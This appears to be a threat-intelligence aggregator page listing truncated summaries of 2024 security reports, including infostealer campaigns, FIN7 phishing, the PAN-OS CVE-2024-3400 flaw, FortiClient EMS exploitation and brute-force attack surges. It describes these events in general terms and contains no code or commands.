By Joey Chen, Chetan Raghuprasad and Alex Karkins. 

Cisco Talos discovered a new ongoing campaign since at least February 2024, operated by a threat actor distributing three famous infostealer malware, including Cryptbot, LummaC2 and Rhadamanthys. Talos also discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.…
Read More

Organizations are increasingly turning to cloud computing for IT agility, resilience and scalability. Amazon Web Services (AWS) stands at the forefront of this digital transformation, offering a robust, flexible and cost-effective platform that helps businesses drive growth and innovation. 

However, as organizations migrate to the cloud, they face a complex and growing threat landscape of sophisticated and cloud-conscious threat actors.…

Read More

Curated bookmark list categorized by area and event monitoring, person of interest search, corporate profiling, mapping, AI, intelligence analysis, reporting tools, collective tools, cryptocurrency, country specific, verification and fact-checking.

They are broken down into appropriate categories such as:

area and event monitoringperson of interest searchcorporate profilingmappingartificial intelligenceintelligence analysisreporting toolscollective toolscryptocurrencycountry specificverification and fact-checking.…
Read More

This video presents an enlightening discussion on the advancements in AI-driven cyber defense technologies, specifically focusing on a groundbreaking product introduced by Cisco called “Cisco HyperShield.” Here are the critical insights from the video:

🌐 AI in Cybersecurity: The video starts by underscoring the transformative role of AI in cybersecurity, emphasizing that both attackers and defenders are leveraging AI to enhance their capabilities.…
Read More

“There are too many firewall features available today; I am using Cisco ASA as an example for this firewall topic.” Cisco ASA is a versatile network security device that combines firewall, antivirus, intrusion prevention, and virtual private network (VPN) capabilities. Cisco ASA is designed to protect networks and ensure secure communications and data transfer.…

Read More
Summary

In late 2023, BlackBerry analysts identified a spear-phishing campaign by threat group FIN7 that targeted a large automotive manufacturer based in the United States. FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights. They used the lure of a free IP scanning tool to run their well-known Anunak backdoor and gain an initial foothold utilizing living off the land binaries, scripts, and libraries (lolbas).…

Read More
Overview

Recently, NSFOCUS CERT detected that Palo Alto Networks issued a security announcement and fixed the command injection vulnerability (CVE-2024-3400) in PAN-OS. Since GlobalProtect gateway or portal configured in PAN-OS does not strictly filter user input, unauthenticated attackers can construct special packets to execute arbitrary code on the firewall with root privileges.…

Read More

Summary: Cisco has warned about a surge in brute-force attacks targeting various devices, including VPN services, web application authentication interfaces, and SSH services, since March 18, 2024.

Threat Actor: Unknown | Brute-Force Attacks Victim: Various organizations | Cisco

Key Point :

The attacks have been observed targeting devices such as Cisco Secure Firewall VPN, Checkpoint VPN, Fortinet VPN, SonicWall VPN, RD Web Services, Mikrotik, Draytek, and Ubiquiti.…
Read More

Summary: Cybersecurity researchers have discovered a new campaign that exploits a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.

Threat Actor: Unknown | Connect:fun Victim: Unnamed media company | Unnamed media company

Key Point :

A new campaign called Connect:fun is exploiting a critical SQL injection flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.…
Read More
During a threat-hunting exercise, Cisco Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. The results of the investigation have shown that the presence of the malicious code is due to the activity of a rare multi-module virus that’s delivered via the .NET…
Read More

Summary: This article discusses the technical analysis of the vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS and the exploitation of this vulnerability by threat actors.

Threat Actor: Operation MidnightEclipse | Operation MidnightEclipse Victim: Palo Alto Networks | Palo Alto Networks

Key Point :

Researchers have discovered a critical command injection vulnerability (CVE-2024-3400) in Palo Alto Networks PAN-OS software, which allows threat actors to execute arbitrary code with root privileges on affected firewalls.…
Read More

Cisco Talos would like to acknowledge Brandon White of Cisco Talos and Phillip Schafer, Mike Moran, and Becca Lynch of the Duo Security Research team for their research that led to the ,identification of these attacks.

Cisco Talos is actively monitoring a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.…

Read More

Identifier: TRR240401 

On March 25, 2024, the U.S. Department of Justice (DoJ) released an indictment of seven hackers associated with APT31, a “hacking group in support of China’s Ministry of State Security” (MSS) which has been active for 14 years. On the same day, the Department of Treasury enacted sanctions on several entities listed in the document.…

Read More

Summary: Threat actors are exploiting a zero-day flaw in Palo Alto Networks PAN-OS software to execute arbitrary code with root privileges on the firewall.

Threat Actor: Operation MidnightEclipse | Operation MidnightEclipse Victim: Palo Alto Networks | Palo Alto Networks

Key Point :

Threat actors are exploiting a zero-day vulnerability in Palo Alto Networks PAN-OS software to execute arbitrary code with root privileges on the firewall.…
Read More

On Friday, April 12, Palo Alto Networks published an advisory on CVE-2024-3400, a CVSS 10 zero-day vulnerability in several versions of PAN-OS, the operating system that runs on the company’s firewalls. According to the vendor advisory, if conditions for exploitability are met, the vulnerability may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.…

Read More

Threat Actor: Unknown | Unknown Victim: Palo Alto Networks | Palo Alto Networks Price: Not applicable Exfiltrated Data Type: Not applicable

Additional Information:

The vulnerability, designated as CVE-2024-3400, affects Palo Alto Networks’ PAN-OS software, specifically targeting the GlobalProtect feature. The vulnerability allows malicious actors to execute arbitrary code with root privileges on vulnerable firewalls.…
Read More